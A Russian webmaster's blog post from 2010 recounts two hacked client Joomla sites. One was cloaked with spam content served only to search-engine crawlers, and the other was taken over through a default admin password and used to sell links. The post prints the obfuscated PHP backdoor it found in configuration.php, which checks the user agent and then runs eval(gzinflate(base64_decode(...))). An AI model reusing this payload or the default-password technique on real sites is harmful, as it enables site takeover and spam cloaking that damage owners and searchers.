Странный взлом клиентских сайтов

Хакеры не дремлют! :) И каждый день придумывают всё новые и новые способы взлома ваших (и наших…) сайтов. Как я уже когда когда-то упоминал, помимо собственных сайтов я так же занимаюсь продвижением клиентских сайтов, и на днях с клиентскими сайтами произошло пару интересных случаев…

взлом сайта

Спонсор поста: Живете в Питере и до сих пор одиноки? В решении этой проблемы вам поможет сайт знакомства в Санкт-Петербурге. Только реальные люди, ни каких ботов!

В начале месяца я, как всегда, полез мониторить клиентские позиции и на паре сайтов заметил огромное падение позиций в Гугле. Начал копать… Залез в кеш гугла и на тебе:

странный взлом

При том, что в Яндексе все нормально! А второй сайт, который так же просел в Гугле, имеет совершенно нормальный кеш…

То есть — адреса страниц правильные, реально существующие. Title иногда тот, что нужен, а иногда то же поменянный, наравне с контентом. Контент — не с этого сайта, сайт на русском, коммерческий. Иду на сайт — нет там такого! Иду файлы смотреть — индексы, шаблоны, htaccess — всё то, что и было, ничего не поменяно. Лезу в базу — то же всё как надо. Пишу в саппорт хостинга, отвечают что такого контента в моих файлах нет (а то я не знаю ;) ), про возможность взлома молчат, советуют обратиться в саппорт Гугла(!)… Поспрашивал на форумах — ни кто не знает куда копать и как от этой заразы избавиться…

Может, кто-то из читателей подскажет решение? Двиг на сайте joomla 1.0.*

И второй случай — вчера закупаюсь ссылками в ГГЛ, ищу сайты из ЯК нужной тематики (для покупки ссылок) и тут на тебе — вылазит сайт,  который я продвигаю другому своему клиенту! Сразу же отзваниюсь, говорят — не в курсе, даже не знают что такое биржа… Интересно :) . Ну, думаю, поломали…

Немного лирики:

Многие студии по созданию сайтов арендуют сервер/vds под размещение сайтов клиентов. После создания сайта он заливается именно туда с дефолтным логином/паролем от админки… Так как, как правило, все такие сайты висят на одном ip, то вычислить, какие там есть сайты не представляет труда… Далее открываем у каждого сайта страницу входа в админку и пробуем дефолтный логин/пароль… Поверьте, далеко не все владельцы сайтов после получения к ним доступа задумываются о смене пароля :) .

В общем, думаю всем понятно как этот сайт «поломали». В итоге, звоню хозяевам сайта, прошу сменить пароль, пишу саппорту ГГЛа:

Здравствуйте!
Я продвигаю сайт http://*****.ru/ и был очень удивлен когда нашел его в вашей бирже, торгующим ссылками. Хозяева об этом ничего не знают (не в курсе, что там ссылки продаются). Завтра я сменю пароль от админки и удалю все ссылки, так что лучше заморозьте деньги на счету продавца.

На что получаю лаконичный ответ:

Администратор
06.07.2010 17:28
Не могли бы вы в доказательства управления сайтом на главной странице разместить в мета-теге слово «Интернет»?

А оно мне надо?? Сегодня снес все проданные изобретательным товарищем ссылки (а напродавать он успел много, штук 40-50), чувствую, не получит он свои денюжки (трехмесячный холд).

В общем, берегите свои сайты, меняйте пароли и не делайте их легкими! Буду благодарен за ответ на вопрос из первой части поста.

Добавлено 12.07.2010:

Спасибо товарищу Crio за подсказку сменить свой юзер агент на Googlebot, в итоге выдалась ошибка:

Error: headers already sent in configuration.php(80) : eval()’d code(1) : eval()’d code(1) : eval()’d code on line 1.
Stopped at line 906 in joomsef.php: HEADERS ALREADY SENT (200)
URL=http://www.*****.ruoption=com_frontpage&Itemid=55:
OPTION=com_frontpage:

Полез в  configuration.php а зараза именно там :) :

Error_Reporting(E_ERROR);
$u=strtolower($_SERVER[«HTTP_USER_AGENT»]);
if (strstr($u,»crawler»)or strstr($u,»googlebot»)or strstr($u,»msnbot»)or strstr($u,»yahoo»)or strstr($u,»search»)or strstr($u,»bing»)or strstr($u,»indexer»)or strstr($u,»cuill.com»)or strstr($u,»clushbot»))
{eval(gzinflate(base64_decode(‘FctND4IgGADgn2PegmWX1iVlmE1qL80PLg2UhgqTTfuwX1+dnz36Ke1KyUlvN7dWN2OrV4GohFGx6eqKWdbDXdCiVxjsKW57TvyrdhEI5GeVMln09lFaw4UdlnNVDIAEEsQwtR4XmRwGTgi+pkOk3XHJK5Al8WPtEFc0mwV9d4DNWOMI2uL/Ic8dTD+nDc4SVnqZu/nBEXwuvPGn67QPwnD3BQ==’)));};

Потер её, всё заработало!

Постовые:  Новости славного города Челябинск — оперативно и интересно!

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

Можно использовать следующие HTML-теги и атрибуты: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

CommentLuv badge